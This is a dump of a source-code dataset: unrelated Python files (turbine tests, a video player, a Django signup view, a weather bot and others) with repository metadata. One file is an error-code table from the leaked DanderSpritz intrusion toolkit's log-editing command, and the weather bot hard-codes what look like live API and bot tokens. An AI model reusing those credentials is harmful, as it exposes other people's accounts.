@pytest.mark.parametrize(['power_idle', 'ct_idle'], [(0, 0), (100, .1)])
def test_GenericWindTurbine_cut_in_out(power_idle, ct_idle):
    """Outside the cut-in/cut-out window (3-25 m/s here) the turbine must
    report exactly the configured idle power and idle ct."""
    ref = V80()
    power_norm = ref.power(15)
    wt = GenericWindTurbine('Generic', ref.diameter(), ref.hub_height(), power_norm / 1e3,
                            turbulence_intensity=0, ws_cutin=3, ws_cutout=25, power_idle=power_idle, ct_idle=ct_idle)
    if 0:  # debug plot, disabled
        u = np.arange(0, 30, .1)
        p, ct = wt.power_ct(u)
        plt.plot(u, p / 1e6, label='Generic')
        plt.plot(u, ref.power(u) / 1e6, label=ref.name())
        plt.ylabel('Power [MW]')
        plt.legend()
        ax = plt.twinx()
        ax.plot(u, ct, '--')
        ax.plot(u, ref.ct(u), '--')
        plt.ylabel('Ct')
        plt.show()
    # Just below cut-in and just above cut-out.
    assert wt.ct(2.9) == ct_idle
    assert wt.power(2.9) == power_idle
    assert wt.ct(25.1) == ct_idle
    assert wt.power(25.1) == power_idle
def test_GenericTIRhoWindTurbine():
    """Power/ct of GenericTIRhoWindTurbine must respond to effective
    turbulence intensity (TI_eff) and air density; exact values are
    regression-checked against previously recorded outputs."""
    wt = GenericTIRhoWindTurbine('2MW', 80, 70, 2000, )
    ws_lst = [11, 11, 11]
    ti_lst = [0, .1, .2]
    p11, ct11 = wt.power_ct(ws=ws_lst, TI_eff=ti_lst, Air_density=1.225)
    p11 /= 1e6
    if 0:  # debug plot, disabled
        u = np.arange(3, 28, .1)
        ax1 = plt.gca()
        ax2 = plt.twinx()
        for ti in ti_lst:
            p, ct = wt.power_ct(u, TI_eff=ti, Air_density=1.225)
            ax1.plot(u, p / 1e6, label='TI=%f' % ti)
            ax2.plot(u, ct, '--')
        ax1.plot(ws_lst, p11, '.')
        ax2.plot(ws_lst, ct11, 'x')
        print(p11.tolist())
        print(ct11.tolist())
        ax1.legend()
        ax1.set_ylabel('Power [MW]')
        ax2.set_ylabel('Ct')
        plt.show()
    # Higher turbulence at 11 m/s lowers both power and ct (regression values).
    npt.assert_array_almost_equal([1.833753, 1.709754, 1.568131], p11)
    npt.assert_array_almost_equal([0.793741, 0.694236, 0.544916], ct11)
    ws_lst = [10] * 3
    rho_lst = [0.9, 1.225, 1.5]
    p10, ct10 = wt.power_ct(ws=ws_lst, TI_eff=0.1, Air_density=rho_lst)
    p10 /= 1e6
    if 0:  # debug plot, disabled
        u = np.arange(3, 28, .1)
        ax1 = plt.gca()
        ax2 = plt.twinx()
        for rho in rho_lst:
            p, ct = wt.power_ct(u, TI_eff=0.1, Air_density=rho)
            ax1.plot(u, p / 1e6, label='Air density=%f' % rho)
            ax2.plot(u, ct, '--')
        ax1.plot(ws_lst, p10, '.')
        ax2.plot(ws_lst, ct10, 'x')
        print(p10.tolist())
        print(ct10.tolist())
        ax1.legend()
        ax1.set_ylabel('Power [MW]')
        ax2.set_ylabel('Ct')
        plt.show()
    # Denser air at 10 m/s yields more power (regression values).
    npt.assert_array_almost_equal([1.040377569594173, 1.3934596754744593, 1.6322037609434554], p10)
    npt.assert_array_almost_equal([0.7987480617157162, 0.7762418395479502, 0.7282996179383272], ct10)
| [
"mmpe@dtu.dk"
] | mmpe@dtu.dk |
01d3ab118c111cade14811b445555a634d2d86f8 | 2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac | /Dsz/PyScripts/Lib/dsz/mca/file/cmd/logedit/errors.py | 9078f31a6058462a9312fcb46aac6150a7228736 | [] | no_license | FingerLeakers/DanderSpritz_docs | f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364 | d96b6a71c039b329f9f81544f645857c75360e7f | refs/heads/master | 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null | UTF-8 | Python | false | false | 1,344 | py | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: errors.py
import mcl.status
# Status codes returned by the logedit command.  Command-specific codes are
# offset from the framework's ERR_START base; human-readable messages for
# them live in the errorStrings mapping defined below.
ERR_SUCCESS = mcl.status.MCL_SUCCESS
ERR_INVALID_PARAM = mcl.status.framework.ERR_START
ERR_MARSHAL_FAILED = mcl.status.framework.ERR_START + 1
ERR_GET_FULL_PATH_FAILED = mcl.status.framework.ERR_START + 2
ERR_OPENFILE_FAILED = mcl.status.framework.ERR_START + 3
ERR_ALLOC_FAILED = mcl.status.framework.ERR_START + 4
ERR_WRITE_FILE_FAILED = mcl.status.framework.ERR_START + 5
ERR_UNICODE_NOT_SUPPORTED = mcl.status.framework.ERR_START + 6
ERR_NO_GOOD_LINES_FOUND = mcl.status.framework.ERR_START + 7
ERR_NO_MATCHING_LINES_FOUND = mcl.status.framework.ERR_START + 8
errorStrings = {ERR_INVALID_PARAM: 'Invalid parameter(s)',
ERR_MARSHAL_FAILED: 'Marshaling data failed',
ERR_GET_FULL_PATH_FAILED: 'Get of full file path failed',
ERR_OPENFILE_FAILED: 'Open of file failed',
ERR_ALLOC_FAILED: 'Memory allocation failed',
ERR_WRITE_FILE_FAILED: 'Write to file failed',
ERR_UNICODE_NOT_SUPPORTED: 'Unicode is not supported on this platform',
ERR_NO_GOOD_LINES_FOUND: 'No good lines found for replacement of bad lines',
ERR_NO_MATCHING_LINES_FOUND: 'No lines found with the given phrase'
} | [
"francisck@protonmail.ch"
] | francisck@protonmail.ch |
9996767e05c7ef174897a5a5d2132490b329d786 | d32d727252dbda22cd3d4b68c0e6f01abf8c7549 | /src/tweets/migrations/0001_initial.py | 51077d551987f68519e415d9d5e34a900dffb366 | [] | no_license | chintan2011/tweetme | aa6fa7666692ccb3bc7e84ceb3fd1b5227b289cb | a7e09cf1e88950bad7d50a1f137cb3762e4bab33 | refs/heads/master | 2020-03-23T06:30:44.815158 | 2018-10-11T02:00:17 | 2018-10-11T02:00:17 | 141,213,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2018-07-14 04:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial, auto-generated migration: creates the Tweet table with an
    auto PK and three free-text content fields."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Tweet',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.TextField()),
                ('content2', models.TextField()),
                ('content3', models.TextField()),
            ],
        ),
    ]
| [
"chintan2011@gmail.com"
] | chintan2011@gmail.com |
d8ebc2755556bbbea6c3815331a3c6b35acf71d2 | a524f7ab59b8c9fa124c68d6e17a1b4cd0c0062b | /string/romanToInteger/Solution.py | 9a7aea77faaec56f327beb80bc8ce89e829c3abe | [] | no_license | sulenn/leetcode_python | 796b1c9cc52446717f01cda8075eb54db479d4cb | 238880a43fac9f2abdfb4202e5d03ce4f1b1e95d | refs/heads/master | 2020-08-06T22:33:06.111130 | 2019-12-15T12:52:51 | 2019-12-15T12:52:51 | 213,183,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 643 | py | class Solution(object):
def romanToInt(self, s):
    """
    Convert a Roman numeral to its integer value.

    Scans the string right to left: a symbol whose value is strictly
    smaller than the symbol immediately to its right is subtractive
    (the I in IV), otherwise it is additive.

    :type s: str
    :rtype: int
    """
    values = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
    total = 0
    prev = 0  # value of the symbol just to the right of the current one
    for symbol in reversed(s):
        value = values[symbol]
        if value < prev:
            total -= value
        else:
            total += value
        prev = value
    return total
if __name__ == '__main__':
    # Ad-hoc smoke test.  NOTE: Python 2 print-statement syntax — this file
    # is not runnable under Python 3 as written.
    s = Solution()
    print s.romanToInt("III")
    print s.romanToInt("IV")
    print s.romanToInt("IX")
print s.romanToInt("LVIII") | [
"273409891@qq.com"
] | 273409891@qq.com |
3ce562a5e5b5881b87d936099c74eb0efc486b7b | 05de912d5579e031a8ccaeb9b8ea70f1431b82ad | /mopidy/audio/mixers/__init__.py | feaccc3d077f9d2b34cbf8dfeb1dad65870713f2 | [
"Apache-2.0"
] | permissive | cave-scorpion/mopidy | bcb0939ddacb0bd295ad36c2b073b369869a15cf | 5d83e3e97a47efcfa62558ba57fd394b8c311aa6 | refs/heads/master | 2021-01-16T22:16:21.134218 | 2013-03-31T14:59:30 | 2013-03-31T14:59:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 479 | py | from __future__ import unicode_literals
import pygst
pygst.require('0.10')
import gst
import gobject
from .auto import AutoAudioMixer
from .fake import FakeMixer
from .nad import NadMixer
def register_mixer(mixer_class):
    """Register *mixer_class* with GObject and expose it as a GStreamer
    element named after the lower-cased class name, at marginal rank."""
    element_name = mixer_class.__name__.lower()
    gobject.type_register(mixer_class)
    gst.element_register(mixer_class, element_name, gst.RANK_MARGINAL)
def register_mixers():
    """Register every mixer element bundled with this package."""
    for mixer_class in (AutoAudioMixer, FakeMixer, NadMixer):
        register_mixer(mixer_class)
| [
"stein.magnus@jodal.no"
] | stein.magnus@jodal.no |
e121faeaf0b31da6101bf336f08d7f4ccf422adb | 4dc05d1f439a8f8ddd6fb1362134a5a4fa7e83b6 | /google code/src/video_player.py | a83cac56ee4d84cbd24ed9b0a0da49063f3b00e3 | [] | no_license | Ramil112358/python-google- | 175a940028950c2ddf752c9d9c0cc50bf89518ca | 7cc6c5cc1a77141e9e08af1442ea657c8dda1ab9 | refs/heads/main | 2023-06-08T12:20:55.393339 | 2021-07-01T11:21:12 | 2021-07-01T11:21:12 | 382,007,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,271 | py | """A video player class."""
from src.video_playlist import Playlist
from src.video import Video
from .video_library import VideoLibrary
import random
import enum
class video_state(enum.Enum):
    """Playback states the player's current video can be in."""
    Playing = 1
    Pause = 2
    Stop = 3
    Continue = 4
class video_under_process:
    """Tracks the video currently loaded in the player and its state."""

    def __init__(self):
        # The player starts stopped, with nothing loaded.
        self.video = None
        self.status = video_state.Stop

    def set_video(self, video, state):
        """Load *video* and immediately transition it to *state*."""
        self.video = video
        self.set_status(state)

    def set_status(self, state):
        """Transition to *state*, announcing the change on stdout."""
        self.status = state
        messages = {
            video_state.Playing: "Playing video: ",
            video_state.Pause: "Pausing video: ",
            video_state.Stop: "Stopping video: ",
            video_state.Continue: "Continuing video: ",
        }
        prefix = messages.get(state)
        if prefix is not None:
            print(prefix + self.video._title)
        if state == video_state.Stop:
            # A stopped player no longer holds a video.
            self.video = None
class VideoPlayer:
    """A class used to represent a Video Player.

    All user feedback is written to stdout.  Playlists are keyed by their
    lower-cased name in self.playlists, while self.userWrittenStylePlaylists
    remembers the original capitalisation for display.
    """
    def __init__(self):
        self._video_library = VideoLibrary() #contain information regarding all videos
        self.video_under_process = video_under_process() #currently playing video
        self.playlists = dict()
        self.userWrittenStylePlaylists = dict()
    # ======================================= PART 1
    def get_video_details(self, video):
        """Return the one-line display string for *video*, including a
        FLAGGED suffix when the video carries a flag reason."""
        addition_string = ""
        if video.flagged != None:
            addition_string = " - FLAGGED (reason: " + video.flagged + ")"
        return str(video._title + " (" + video._video_id + ") [" + ' '.join(list(video._tags)) + "]" + addition_string)
    def Sort_video_WRT_Titles(self, videos):
        """Sort *videos* in place by title and return the same list."""
        videos.sort(key = lambda x: x._title)
        return videos
    def number_of_videos(self):
        # Print how many videos the library contains.
        num_videos = len(self._video_library.get_all_videos())
        print(f"{num_videos} videos in the library")
    def show_all_videos(self):
        """Returns all videos."""
        # print("show_all_videos needs implementation")
        print("Here's a list of all available videos:")
        for vid in self.Sort_video_WRT_Titles( self._video_library.get_all_videos() ):
            print( " ", self.get_video_details(vid) )
    def play_video(self, video_id):
        """Plays the respective video.
        Args:
            video_id: The video_id to be played.
        """
        # print("play_video needs implementation")
        video = self._video_library.get_video(video_id)
        if video != None:
            if(video.flagged == None):
                if self.video_under_process.status != video_state.Stop: #for avoiding the first time error print message from stop_video
                    self.stop_video() #stopping the current video if playing
                self.video_under_process.set_video(video, video_state.Playing)
            else:
                print("Cannot play video: Video is currently flagged (reason: "+ video.flagged +")")
        else:
            print("Cannot play video: Video does not exist")
    def stop_video(self):
        """Stops the current video."""
        # print("stop_video needs implementation")
        if self.video_under_process.status != video_state.Stop:
            self.video_under_process.set_status(video_state.Stop)
        else:
            print("Cannot stop video: No video is currently playing")
    def play_random_video(self):
        """Plays a random video from the video library."""
        # print("play_random_video needs implementation")
        videos = self._video_library.get_all_videos()
        #if all videos are marked as flagged them showing no video avaiilable for random function
        if len([x for x in videos if x.flagged == None]) == 0:
            print("No videos available")
            return
        # NOTE(review): the random pick is taken from the full list, so a
        # flagged video can still be chosen; play_video then refuses it.
        vid = videos[ random.randint(0, len(videos)-1) ]
        self.play_video(vid._video_id)
    def pause_video(self):
        """Pauses the current video."""
        # print("pause_video needs implementation")
        if self.video_under_process.video != None:
            if( self.video_under_process.status != video_state.Pause ):
                self.video_under_process.set_status(video_state.Pause)
            else:
                print("Video already paused:", self.video_under_process.video._title)
        else:
            print("Cannot pause video: No video is currently playing")
    def continue_video(self):
        """Resumes playing the current video."""
        # print("continue_video needs implementation")
        if self.video_under_process.video != None:
            if self.video_under_process.status == video_state.Pause:
                self.video_under_process.set_status(video_state.Continue)
            else:
                print("Cannot continue video: Video is not paused")
        else:
            print("Cannot continue video: No video is currently playing")
    def show_playing(self):
        """Displays video currently playing."""
        # print("show_playing needs implementation")
        if self.video_under_process.video != None:
            if self.video_under_process.status != video_state.Pause:
                print("Currently playing:", self.get_video_details(self.video_under_process.video))
            else:
                print("Currently playing:", self.get_video_details(self.video_under_process.video), "- PAUSED")
        else:
            print("No video is currently playing")
    # ======================================= PART 2
    def is_playlist_exist(self, name):
        """Return True when a playlist with lower-cased key *name* exists."""
        return name in self.playlists.keys()
    def create_playlist(self, playlist_name):
        """Creates a playlist with a given name.
        Args:
            playlist_name: The playlist name.
        """
        # print("create_playlist needs implementation")
        pln = playlist_name.lower()
        if pln in self.playlists.keys():
            print("Cannot create playlist: A playlist with the same name already exists")
        else:
            self.playlists[ pln ] = []
            self.userWrittenStylePlaylists[pln] = playlist_name # for later user to display the playlist
            print("Successfully created new playlist:", self.userWrittenStylePlaylists[pln])
    def add_to_playlist(self, playlist_name, video_id):
        """Adds a video to a playlist with a given name.
        Args:
            playlist_name: The playlist name.
            video_id: The video_id to be added.
        """
        # print("add_to_playlist needs implementation")
        pln = playlist_name.lower()
        video = self._video_library.get_video(video_id)
        if self.is_playlist_exist(pln):
            if video != None:
                if(video.flagged == None):
                    if video in self.playlists[ pln ]:
                        print("Cannot add video to " + playlist_name + ": Video already added")
                    else:
                        self.playlists[ pln ].append( video )
                        print("Added video to " + playlist_name + ":", video._title)
                else:
                    print("Cannot add video to " + playlist_name + ": Video is currently flagged (reason: " + \
                        video.flagged + ")")
            else:
                print("Cannot add video to " + playlist_name + ": Video does not exist")
        else:
            print("Cannot add video to " + playlist_name + ": Playlist does not exist")
    def show_all_playlists(self):
        """Display all playlists."""
        # print("show_all_playlists needs implementation")
        if(len(self.playlists.keys()) == 0): #means no playlist added
            print("No playlists exist yet")
        else:
            print("Showing all playlists: ")
            for playlist in sorted(self.playlists.keys()):
                print( " " + self.userWrittenStylePlaylists[playlist.lower()])
    def show_playlist(self, playlist_name):
        """Display all videos in a playlist with a given name.
        Args:
            playlist_name: The playlist name.
        """
        # print("show_playlist needs implementation")
        pln = playlist_name.lower()
        if self.is_playlist_exist(pln):
            videos = self.playlists[pln]
            print("Showing playlist:", playlist_name)
            if len(videos) != 0 :
                for vid in videos:
                    print( " ", self.get_video_details(vid))
            else:
                print( " ", "No videos here yet")
        else:
            print( "Cannot show playlist " + playlist_name + ": Playlist does not exist")
    def remove_from_playlist(self, playlist_name, video_id):
        """Removes a video to a playlist with a given name.
        Args:
            playlist_name: The playlist name.
            video_id: The video_id to be removed.
        """
        # print("remove_from_playlist needs implementation")
        pln = playlist_name.lower()
        video = self._video_library.get_video(video_id)
        if self.is_playlist_exist(pln):
            if video != None:
                if video in self.playlists[ pln ]:
                    print("Removed video from " + playlist_name + ":", video._title)
                    self.playlists[ pln ].remove( video )
                else:
                    print("Cannot remove video from " + playlist_name + ": Video is not in playlist")
            else:
                print("Cannot remove video from " + playlist_name + ": Video does not exist")
        else:
            print("Cannot remove video from " + playlist_name + ": Playlist does not exist")
    def clear_playlist(self, playlist_name):
        """Removes all videos from a playlist with a given name.
        Args:
            playlist_name: The playlist name.
        """
        # print("clears_playlist needs implementation")
        pln = playlist_name.lower()
        if self.is_playlist_exist(pln):
            self.playlists[ pln ] = []
            print("Successfully removed all videos from " + playlist_name )
        else:
            print("Cannot clear playlist " + playlist_name + ": Playlist does not exist")
    def delete_playlist(self, playlist_name):
        """Deletes a playlist with a given name.
        Args:
            playlist_name: The playlist name.
        """
        # print("deletes_playlist needs implementation")
        pln = playlist_name.lower()
        if self.is_playlist_exist(pln):
            # NOTE(review): the matching userWrittenStylePlaylists entry is
            # left behind here, and the confirmation prints the lower-cased
            # name rather than the user's original capitalisation.
            self.playlists.pop( pln )
            print("Deleted playlist: " + pln )
        else:
            print("Cannot delete playlist " + pln + ": Playlist does not exist")
    # ======================================= PART 3
    def search_videos(self, search_term):
        """Display all the videos whose titles contain the search_term.
        Args:
            search_term: The query to be used in search.
        """
        # print("search_videos needs implementation")
        all_videos = self._video_library.get_all_videos()
        response_vid = []
        # Case-insensitive substring match on titles; flagged videos excluded.
        for video in all_videos:
            if(video.flagged == None):
                if search_term.lower() in video._title.lower():
                    response_vid.append(video)
        if(len(response_vid) != 0):
            i = 1
            print("Here are the results for "+ search_term + ":")
            for rvid in response_vid:
                print(" ", str(i) + ")", self.get_video_details(rvid))
                i+=1
            print( "Would you like to play any of the above? If yes, specify the number of the video.")
            print( "If your answer is not a valid number, we will assume it's a no.")
            val = input()
            if(val.isnumeric()):
                _index = int(val)
                if _index > 0 and _index <= len(response_vid):
                    self.play_video(response_vid[_index-1]._video_id)
                # else:
                #     print("")
        else:
            print("No search results for", search_term)
    def search_videos_tag(self, video_tag):
        """Display all videos whose tags contains the provided tag.
        Args:
            video_tag: The video tag to be used in search.
        """
        # print("search_videos_tag needs implementation")
        all_videos = self._video_library.get_all_videos()
        response_vid = []
        # Exact tag membership test; flagged videos excluded.
        for video in all_videos:
            if(video.flagged == None):
                if video_tag in video._tags:
                    response_vid.append(video)
        if(len(response_vid) != 0):
            i = 1
            print("Here are the results for "+ video_tag + ":")
            for rvid in response_vid:
                print(" ", str(i) + ")", self.get_video_details(rvid))
                i+=1
            print( "Would you like to play any of the above? If yes, specify the number of the video.")
            print( "If your answer is not a valid number, we will assume it's a no.")
            val = input()
            if(val.isnumeric()):
                _index = int(val)
                if _index > 0 and _index <= len(response_vid):
                    self.play_video(response_vid[_index-1]._video_id)
                # else:
                #     print("")
        else:
            print("No search results for", video_tag)
    # ======================================= PART 4
    def flag_video(self, video_id, flag_reason=""):
        """Mark a video as flagged.
        Args:
            video_id: The video_id to be flagged.
            flag_reason: Reason for flagging the video.
        """
        # print("flag_video needs implementation")
        video = self._video_library.get_video(video_id)
        #if not reason is provided
        if(flag_reason == ""):
            flag_reason = "Not supplied"
        if video != None:
            if(video.flagged == None):
                #if it is the same video that is playing then stop it only
                if(self.video_under_process.video != None):
                    if(video_id == self.video_under_process.video._video_id):
                        if(self.video_under_process.status == video_state.Playing or self.video_under_process.status == video_state.Pause):
                            self.video_under_process.set_status(video_state.Stop)
                video.flagged = flag_reason
                print("Successfully flagged video:", video._title + " (reason: "+ video.flagged + ")")
            else:
                print("Cannot flag video: Video is already flagged")
        else:
            print("Cannot flag video: Video does not exist")
    def allow_video(self, video_id):
        """Removes a flag from a video.
        Args:
            video_id: The video_id to be allowed again.
        """
        # print("allow_video needs implementation")
        video = self._video_library.get_video(video_id)
        if video != None:
            if(video.flagged != None):
                video.flagged = None
                print("Successfully removed flag from video:", video._title)
            else:
                print("Cannot remove flag from video: Video is not flagged")
        else:
            print("Cannot remove flag from video: Video does not exist")
| [
"noreply@github.com"
] | Ramil112358.noreply@github.com |
6312302356179221ff9856c40701a2c68915f9da | 3f3eed680fa70d8fa97f0987f0cc848c9ae9cee7 | /Practice4/task4.py | db42273f59cbf995bde9bbf321a6c303bc679290 | [] | no_license | fatawesome/StructProgramming | 8480b5a5ac8e5076221df80d940187333f04f35c | 2a4f210a5dd3c87aaf8859d60a357bd832956c26 | refs/heads/master | 2021-01-22T21:00:05.658294 | 2017-05-11T17:06:28 | 2017-05-11T17:06:28 | 85,385,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | import sys
text = input()

# Print the length of the longest run of consecutive identical characters.
count = 1
# BUG FIX: this previously started at -sys.maxsize - 1 and was only updated
# when a repeated adjacent pair was found, so inputs with no repeats
# (e.g. "abc") printed a huge negative number instead of 1.
max_count = 1 if text else 0
for i in range(1, len(text)):
    if text[i - 1] == text[i]:
        count = count + 1
        if count > max_count:
            max_count = count
    else:
        count = 1
print(max_count)
| [
"fatawesomeee@gmail.com"
] | fatawesomeee@gmail.com |
fea3bbbd91ad589283a5dfa02ff741773378fb3f | 68111bf8bb7c02f283f71f53f279810697281f61 | /store/views/signup.py | 9b7726fc73f8bd21bc431a64cd5c55339e487fd3 | [] | no_license | gauravpandey068/eshop | 915205bbb4ec8e28d58b061dff1b960e0f1524ea | 35ff0b8fe434549013b115a17c6a64c411431cce | refs/heads/main | 2023-07-26T00:24:31.644617 | 2021-01-16T09:10:44 | 2021-01-16T09:10:44 | 330,108,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,446 | py | from django.shortcuts import render, redirect
from django.contrib.auth.hashers import make_password
from store.models.customer import Customer
from django.views import View
class Signup(View):
    """Customer registration view: GET renders the form, POST validates
    the submitted details and registers the customer."""

    def get(self, request):
        # Blank registration form.
        return render(request, 'signup.html')

    def post(self, request):
        """Validate the submitted fields; register and redirect home on
        success, otherwise re-render the form with an error message."""
        postData = request.POST
        first_name = postData.get('firstname')
        last_name = postData.get('lastname')
        phone = postData.get('phone')
        email = postData.get('email')
        password = postData.get('password')

        # Echoed back to the template so the user keeps their input when
        # validation fails (the password is deliberately not echoed).
        value = {
            'first_name': first_name,
            'last_name': last_name,
            'phone': phone,
            'email': email
        }
        customer = Customer(first_name=first_name,
                            last_name=last_name,
                            phone=phone,
                            email=email,
                            password=password)
        error_message = self.validateCustomer(customer)
        if not error_message:
            # SECURITY FIX: removed a debug print that logged the submitted
            # fields, including the plain-text password.
            # Hash before persisting; never store the raw password.
            customer.password = make_password(customer.password)
            customer.register()
            return redirect('homepage')
        else:
            data = {
                'error': error_message,
                'values': value
            }
            return render(request, 'signup.html', data)

    def validateCustomer(self, customer):
        """Return an error message for the first invalid field, or None
        when every check passes."""
        error_message = None
        if not customer.first_name:
            error_message = "First Name Required !!"
        elif len(customer.first_name) < 3:
            error_message = 'First Name must be 3 char long or more'
        elif not customer.last_name:
            error_message = 'Last Name Required'
        elif len(customer.last_name) < 3:
            # BUG FIX: message previously claimed "4 char" while the check
            # above enforces a minimum of 3 characters.
            error_message = 'Last Name must be 3 char long or more'
        elif not customer.phone:
            error_message = 'Phone Number required'
        elif len(customer.phone) < 10:
            error_message = 'Phone Number must be 10 char Long'
        elif len(customer.password) < 6:
            error_message = 'Password must be 6 char long'
        elif len(customer.email) < 5:
            error_message = 'Email must be 5 char long'
        elif customer.isExists():
            error_message = 'Email Address Already Registered..'
        return error_message
| [
"pandeygaurav068@gmail.com"
] | pandeygaurav068@gmail.com |
06d216017db674320df2d21293626f0def46e3fa | d0032a8f5dc002aa8e49dde603e3aa802a719683 | /bot.py | 595670f7615587971ea7ad1d9a9329a00061b6e2 | [] | no_license | Dymos16/bot | ddcc29e790bff82fe3f83c2f0bdcb9d920c67e64 | ed881c3dafd44bdcb6126b11ca023bf00dc16d7d | refs/heads/master | 2022-09-11T19:18:08.105148 | 2020-05-24T14:08:18 | 2020-05-24T14:08:18 | 266,541,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | import pyowm
import telebot
# NOTE(review): hard-coded API credentials — move these into environment
# variables or a config file before sharing or deploying this bot.
owm = pyowm.OWM('6d00d1d4e704068d70191bad2673e0cc', language="ru")
bot = telebot.TeleBot("1230024109:AAHoslqnQcmS1B9EuHM4k4SG7bV0KZ1B13w")


@bot.message_handler(content_types=['text'])
def send_echo(message):
    """Reply to a text message (a city name) with its current weather,
    temperature, and a clothing suggestion."""
    observation = owm.weather_at_place(message.text)
    w = observation.get_weather()
    temp = w.get_temperature('celsius')["temp"]
    # BUG FIX: the reply previously used "/n" instead of "\n" for line
    # breaks and omitted the spaces around the interpolated city name,
    # weather status, and temperature, producing one garbled line.
    answer = "В городе " + message.text + " сейчас " + w.get_detailed_status() + "\n"
    answer += "Температура около " + str(temp) + "\n\n"
    if temp < 10:
        answer += "В такую погоду нужно одеться потеплее"
    elif temp < 20:
        answer += "В такую погоду можно не утепляться"
    else:
        answer += "Погода отменная. Одевайся как хочешь"
    bot.send_message(message.chat.id, answer)
bot.polling ( none_stop = True ) | [
"noreply@github.com"
] | Dymos16.noreply@github.com |
fb6c4681c0f1024ba2952acc051b817555e4f465 | 173227142c085b6463dff03018615dd98a1c55d2 | /Methods and Functions/Question 6.py | 136942e93220dfb948b7b3221f0e53ea6bbc64bf | [] | no_license | HBlack09/ICTPRG-Python | 095718567e8081ca8f75066241adbb707f3db717 | 53057ba10219901a0c690acb8c8cbdf911f71cc1 | refs/heads/main | 2023-05-28T01:18:49.365555 | 2021-06-23T01:56:06 | 2021-06-23T01:56:06 | 358,219,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | def SortWordsAlphabetically(s):
    # Lower-case the whole string, then split it into words on '-'.
    s = [c for c in s.lower().split('-')]
    # Sort the words alphabetically and re-join them with '-'.
    s.sort()
    return '-'.join(s)
# Ad-hoc smoke tests: each line prints True when the call matches the
# expected lower-cased, alphabetically sorted result.
print("Test 1 Passed: " + str(SortWordsAlphabetically("Bob-does-not-like-frank") == 'bob-does-frank-like-not'))
print("Test 2 Passed: " + str(SortWordsAlphabetically("why-am-i-doing-this-this-is-terrible") == "am-doing-i-is-terrible-this-this-why"))
print("Test 3 Passed: " + str(SortWordsAlphabetically("frank-kill-zoe-did") == "did-frank-kill-zoe"))
| [
"noreply@github.com"
] | HBlack09.noreply@github.com |
e6ba65a1e4349381acba5c01404dcd17efb2c8d3 | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderBeginnerContest/1XX/186/E_another.py | 5cd6db2ce83b44b90602978bdf66cc3d4f96d6b5 | [] | no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 1,876 | py | """
以下を参考に作成
https://twitter.com/kyopro_friends/status/1341216644727676928
s + k * x ≡ 0 mod n を解く(xを求める).
鳥の巣原理から x <= n のため,
x = im + j (0 <= i, j <= m = n**0.5)
と表せる.
j が 0 ~ m の時の位置(s + k * j mod n)を前計算し,mapに持っておく(jmap).
s + k * (im + j) ≡ 0 mod n
s + k * j + k * im ≡ 0 mod n
((s + k * j) mod n) + (k * im mod n) = n or 0 ≡ 0 mod n
と表せるため, ある i に対して
(k * im mod n) + p = n or 0
となるような p が jmap に存在していれば, その時の im + j が答えとなる.
これを i が 0 ~ m の範囲で全探索し, 存在していなければ -1 となる.
@Baby-Step Giant-Step
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
from collections import Counter
inf = float('inf')
mod = 10 ** 9 + 7
# from decorator import stop_watch
#
#
# @stop_watch
def solve(T, NSK):
    """For each query (n, s, k) print the smallest x >= 0 with
    s + k*x ≡ 0 (mod n), or -1 when no such x exists.

    Baby-step giant-step: write x = i*step + j with step ≈ sqrt(n),
    precompute the residues reached by the baby steps j, then scan the
    giant steps i for a matching residue.
    """
    for n, s, k in NSK:
        step = int(n ** 0.5) + 1
        # Baby steps: first index j (0 <= j < step) reaching each residue.
        baby = {}
        for j in range(step):
            residue = (s + k * j) % n
            if residue not in baby:
                baby[residue] = j
        # Giant steps: find the smallest i whose required residue exists.
        for i in range(step):
            need = (n - (k * i * step) % n) % n
            if need in baby:
                print(i * step + baby[need])
                break
        else:
            print(-1)
if __name__ == '__main__':
    # Read T queries of (n, s, k) from stdin, one triple per line.
    T = int(input())
    NSK = [[int(i) for i in input().split()] for _ in range(T)]
    solve(T, NSK)
# # test
# from random import randint
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# T = 100
# NSK = []
# for _ in range(T):
# N = randint(1, 10 ** 9)
# S = randint(1, N - 1)
# K = randint(1, 10 ** 9)
# NSK.append([N, S, K])
# solve(T, NSK)
| [
"39874652+corutopi@users.noreply.github.com"
] | 39874652+corutopi@users.noreply.github.com |
61b606c1dfe74cfc71a5244dcf12c871c3d47dee | 1fea3ad1608fbe8d7a695176ce001c32992baab4 | /web_scraping/ec2files/ec2file0.py | bdcb33fe4e712a9908fed1ce7a984655bbc9e087 | [
"MIT"
